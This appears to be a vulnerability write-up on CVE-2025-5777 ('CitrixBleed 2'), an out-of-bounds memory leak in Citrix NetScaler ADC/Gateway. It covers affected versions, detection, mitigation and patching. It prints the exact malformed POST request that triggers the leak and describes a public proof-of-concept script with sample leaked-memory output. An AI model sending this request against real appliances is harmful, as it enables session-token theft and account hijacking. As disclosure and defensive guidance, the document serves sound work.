CVE-2025-5777 – CitrixBleed 2: Memory Leak Vulnerability in Citrix NetScaler ADC/Gateway
Overview
A newly disclosed critical vulnerability in Citrix NetScaler ADC and NetScaler Gateway, identified as CVE-2025-5777, allows unauthenticated attackers to leak memory contents from vulnerable appliances via a specially crafted HTTP request. This flaw has been dubbed "CitrixBleed 2", referencing similarities to the original CitrixBleed (CVE-2023-4966).
Disclosed and demonstrated by @win3zz, this vulnerability impacts widely used Citrix deployments and has already seen active exploitation in the wild, including session hijacking and credential exposure.
- CVE ID: CVE-2025-5777
- Vulnerability Type: Out-of-Bounds Read / Memory Leak
- Impact: Information Disclosure, Session Hijacking
- Affected Products: NetScaler ADC and NetScaler Gateway (formerly Citrix ADC/Gateway)
- Exploit Author: https://github.com/win3zz
- CVSS Score: 9.3 (Critical)
Vulnerability Details
The vulnerability is triggered by sending a malformed HTTP POST request to the Citrix authentication endpoint:
POST /p/u/doAuthentication.do HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
Content-Length: 17
login=admin&passwd
Notice that the passwd parameter lacks an = and a value. When this malformed payload is received, the application fails to properly sanitize and initialize memory used in response generation. As a result, uninitialized stack memory is leaked back in the server's XML response, specifically within the <InitialValue> field.
Each request leaks 127 bytes of memory, and repeated queries can result in exposure of:
- Session tokens
- Usernames and passwords
- Configuration information
- Potentially sensitive in-memory data
This behavior is analogous to Heartbleed and CitrixBleed (2023), but the endpoint and trigger mechanism are different.
Affected Versions
According to Citrix's security advisory and community reports, the following versions are vulnerable:
- NetScaler ADC and Gateway:
- 14.1 before 14.1-43.56
- 13.1 before 13.1-58.32
- 13.0 before 13.0-92.24
- NetScaler ADC FIPS:
- 13.1 before 13.1-37.235
- 12.1 before 12.1-55.328
Users of these builds are strongly encouraged to update immediately.
Proof of Concept
The GitHub repository provides a Python-based PoC script named exploit.py, which demonstrates how an attacker can repeatedly send crafted HTTP POST requests and retrieve leaked memory from the XML response.
Key Features:
- Uses
aiohttp to send asynchronous requests
- Extracts the
<InitialValue> field from the server response
- Dumps the memory leak in hex and ASCII for inspection
Sample Output:
00000000 4d 7a 35 7a 6a 4a 76 61 6e 39 68 61 38 79 6d 76 |Mz5zjJvan9ha8ymv|
00000010 55 4e 57 6c 4a 51 3d 3d 00 00 00 00 00 00 00 00 |UNWlJQ==........|
The dumped memory can contain base64-encoded session data, token strings, and other sensitive elements.
Real-World Threat
Active Exploitation:
- CISA added CVE-2025-5777 to its Known Exploited Vulnerabilities (KEV) list.
- Attackers are using this to harvest session tokens and impersonate users, bypassing MFA.
- Security firms reported exploitation in financial, government, and cloud infrastructure sectors.
Public Scanners and Exploits:
- Threat actors and security researchers alike are scanning for vulnerable endpoints.
- Tools like Shodan and custom scripts are being used to fingerprint exposed appliances.
Detection & Logging
Indicators of Compromise:
- Repeated POST requests to
/p/u/doAuthentication.do with malformed parameters
- Responses from appliances containing suspicious
<InitialValue> blocks
- Unexpected session reuse or impersonation events
Detection Techniques:
- Monitor HTTP logs for malformed
passwd parameters
- Inspect returned XML for leaked memory patterns
- Use IDS signatures matching POST body anomalies
Mitigation
Patch Immediately:
Upgrade to the following (or newer) versions:
- NetScaler ADC/Gateway 14.1 → 14.1-43.56
- NetScaler ADC/Gateway 13.1 → 13.1-58.32
- NetScaler ADC/Gateway 13.0 → 13.0-92.24
- FIPS/NDcPP builds → Apply corresponding patched firmware
Temporary Protections:
- Deploy WAF rules to block malformed POST bodies
- Restrict access to authentication endpoints from untrusted sources
- Enforce short session lifetimes and invalidate all existing sessions post-upgrade
Conclusion
CVE-2025-5777 is a highly dangerous memory disclosure bug affecting Citrix appliances in default configurations. The ease of exploitation, combined with real-world impacts like session hijacking and MFA bypass, make it a critical issue that demands immediate attention.
Organizations using NetScaler ADC or Gateway should patch urgently, audit logs for signs of exploitation, and assume compromise if unpatched appliances were publicly accessible.
References
Support Crack-Vault and help us keep providing free tools. Every donation counts!
(BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn
